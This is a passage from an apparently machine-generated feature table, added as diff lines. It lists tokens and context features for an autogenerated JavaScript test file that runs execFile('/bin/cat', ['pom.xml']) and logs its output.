enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:53:59:58 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:61:59:66 | stderr | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:61:59:66 | stderr | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:61:59:66 | stderr | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:61:59:66 | stderr | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:61:59:66 | stderr | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:9 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:9 | console | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:9 | console | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:9 | console | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:9 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:13 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:13 | console.log | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:13 | console.log | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:13 | console.log | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:13 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | console.log(stdout) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | console.log(stdout) | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | console.log(stdout) | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | console.log(stdout) | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | console.log(stdout) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | exceptional return of console.log(stdout) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | exceptional return of console.log(stdout) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | exceptional return of console.log(stdout) | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | exceptional return of console.log(stdout) | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | exceptional return of console.log(stdout) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:11:61:13 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:11:61:13 | log | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:11:61:13 | log | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:11:61:13 | log | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:11:61:13 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:15:61:20 | stdout | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:64:8 | execFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:64:8 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:64:8 | execFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | exceptional return of execFil ... r); \\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | exceptional return of execFil ... r); \\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | exceptional return of execFil ... r); \\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | execFil ... r); \\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | execFil ... r); \\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | execFil ... r); \\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:10:64:19 | '/bin/cat' | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:10:64:19 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:10:64:19 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:10:64:19 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:10:64:19 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:10:64:19 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:22:64:34 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:22:64:34 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:22:64:34 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:22:64:34 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:22:64:34 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:22:64:34 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:24:64:32 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:24:64:32 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:24:64:32 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:24:64:32 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:24:64:32 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:24:64:32 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:64:36 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:64:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:64:36 | this | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:64:36 | this | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:64:36 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | 'arguments' object of anonymous function | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | 'arguments' object of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | exceptional return of anonymous function | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | exceptional return of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | functio ... rr); \\n} | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | functio ... rr); \\n} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | functio ... rr); \\n} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | functio ... rr); \\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | functio ... rr); \\n} | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | functio ... rr); \\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | return of anonymous function | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | return of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:37:66:1 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:46:64:50 | error | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:46:64:50 | error | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:46:64:50 | error | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:46:64:50 | error | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:46:64:50 | error | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:53:64:58 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:53:64:58 | stdout | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:53:64:58 | stdout | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:53:64:58 | stdout | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:53:64:58 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:61:64:66 | stderr | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:9 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:9 | console | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:9 | console | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:9 | console | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:9 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:13 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:13 | console.log | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:13 | console.log | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:13 | console.log | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:13 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | console.log(stderr) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | console.log(stderr) | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | console.log(stderr) | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | console.log(stderr) | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | console.log(stderr) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | exceptional return of console.log(stderr) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | exceptional return of console.log(stderr) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | exceptional return of console.log(stderr) | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | exceptional return of console.log(stderr) | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | exceptional return of console.log(stderr) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:11:65:13 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:11:65:13 | log | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:11:65:13 | log | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:11:65:13 | log | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:11:65:13 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | enclosingFunctionBody | error stdout stderr console log stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:15:65:20 | stderr | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:69:8 | execFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:69:8 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:69:8 | execFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | exceptional return of execFil ... ut);\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | exceptional return of execFil ... ut);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | exceptional return of execFil ... ut);\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | execFil ... ut);\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | execFil ... ut);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | execFil ... ut);\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:10:69:19 | '/bin/cat' | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:10:69:19 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:10:69:19 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:10:69:19 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:10:69:19 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:10:69:19 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:22:69:34 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:22:69:34 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:22:69:34 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:22:69:34 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:22:69:34 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:22:69:34 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:24:69:32 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:24:69:32 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:24:69:32 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:24:69:32 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:24:69:32 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:24:69:32 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:38:69:55 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:38:69:55 | {encoding: 'utf8'} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:38:69:55 | {encoding: 'utf8'} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:38:69:55 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:38:69:55 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:38:69:55 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:46 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:46 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:46 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:54 | encoding: 'utf8' | contextFunctionInterfaces | 